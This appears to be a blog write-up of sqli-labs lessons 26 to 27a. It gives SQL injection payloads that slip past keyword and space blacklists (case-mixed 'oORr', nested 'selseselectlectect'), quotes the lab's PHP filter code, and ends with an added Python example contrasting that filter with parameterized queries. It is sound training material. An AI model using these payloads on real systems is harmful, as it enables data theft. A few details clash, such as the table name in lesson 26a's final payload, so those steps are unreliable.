sqli labs 6
2016-10-16 14:23
1. Lesson 26
When id=1, the page reports an error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
So I guess the SQL statement is: select * from table where id='1' limit 0,1;
After a few tries I found that some characters are filtered, for example: -- , space, #, or, and.
Since spaces are filtered, the SQL to construct can be: id=1'or'1, and the page displays normally.
Next is to figure out how to read the data in the database, so we go on to construct our SQL: id=1'oORr(select(concat((select(count(id))from(userse)),'')))='123
The page reports an error: Table 'security.userse' doesn't exist
This lesson is worth studying in more depth.
2. Lesson 26a
Looking at the source code: $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
The code filters some strings: or, and, --, space, #, /. A few experiments show that -- and # are definitely filtered, so the focus comes back to constructing an SQL statement that is not filtered.
With id=-1')oORr(select(concat((select(count(id))from(users)),'')))>('0 the page displays normally, showing Your Login name:Dumb Your Password:Dumb
With id=-1')oORr(select(concat((select(count(id))from(useras)),'')))>('0 the page does not display normally, that is, it does not show Your Password:Dumb
OK, so the SQL injection statement is: -1')oORr(select(concat((select(count(id))from(useras)),'')))>('0
3. Lesson 27:
Entering id=1, the page displays normally. Entering id=1', the page reports an error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''12'' LIMIT 0,1' at line 1
Reconstructing the SQL statement: select * from table where id='1' limit 0,1;
Trying id=1' or 1=1 #--+ shows that the code filters spaces and --. I looked at the source code and found that it filters many strings:

    $id= preg_replace('/[\/\*]/',"", $id); //strip out /*
    $id= preg_replace('/[--]/',"", $id); //Strip out --.
    $id= preg_replace('/[#]/',"", $id); //Strip out #.
    $id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
    $id= preg_replace('/select/m',"", $id); //Strip out select (single pass, case-sensitive).
    $id= preg_replace('/[ +]/',"", $id); //Strip out spaces (duplicate of the rule above).
    $id= preg_replace('/union/s',"", $id); //Strip out union
    $id= preg_replace('/select/s',"", $id); //Strip out select
    $id= preg_replace('/UNION/s',"", $id); //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id); //Strip out Union
    $id= preg_replace('/Select/s',"", $id); //Strip out Select

Based on these filtered strings, construct the SQL: id=-1'or(selseselectlectect(count(id))from(users))>'0, and the page displays normally: Your Login name:Dumb Your Password:Dumb
Constructing id=-1'or(selseselectlectect(count(id))from(users3))>'0, the page shows a database error: Table 'security.us3ers' doesn't exist
To keep extracting information, just keep injecting!!!
4. Lesson 27a:
Entering id=1, the page displays normally!!! Entering id=1" the page displays abnormally.
Constructing the SQL: id=-1"or(selseselectlectect(count(id))from(users3))>"0, the page displays abnormally; -1"or(selseselectlectect(count(id))from(users))>"0, the page displays normally.
This lesson is very similar to the previous one, except that the database error is not displayed.
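As an added example (not the post's or sqli-labs' own code), the following Python port of the Less-27 filter chain used in lessons 27 and 27a shows why single-pass keyword stripping is not idempotent, and puts it next to the parameterized query that makes such filtering unnecessary; the sqlite3 in-memory table standing in for the lab's MySQL users table and its rows are assumptions.

```python
import re
import sqlite3

# Port of the Less-27 preg_replace chain shown above. Each rule runs once, in
# this order, exactly like the PHP; PHP's [--] is a one-character class, so it
# is written here as a plain "-".
LESS27_RULES = [
    r"[\/\*]", r"-", r"[#]", r"[ +]", r"select", r"[ +]",
    r"union", r"select", r"UNION", r"SELECT", r"Union", r"Select",
]


def blacklist_filter(value: str) -> str:
    """One pass over the rules, as the challenge code does it."""
    for pattern in LESS27_RULES:
        value = re.sub(pattern, "", value)
    return value


def is_idempotent(value: str) -> bool:
    """A strip-and-forget filter should at least be a fixpoint; this one is not."""
    once = blacklist_filter(value)
    return blacklist_filter(once) == once


def lookup_parameterized(user_id: str):
    """Hardened form: the input is bound as data, so no keyword filtering is needed.

    Uses an in-memory sqlite3 table as a stand-in for the lab's security.users
    table (assumption); the rows are constructed sample data.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "alice", "constructed-pw")],
    )
    # The placeholder compares the whole string against id; it is never parsed as SQL.
    row = conn.execute(
        "SELECT username, password FROM users WHERE id = ? LIMIT 0,1", (user_id,)
    ).fetchone()
    conn.close()
    return row


if __name__ == "__main__":
    print(blacklist_filter("selseselectlectect"))  # the keyword survives one pass
    print(lookup_parameterized("1"), lookup_parameterized("-1'or'1"))
```

Running the filter twice would catch this particular input, but a blacklist that has to be iterated is a sign the design is wrong; binding the value as a parameter removes the question entirely.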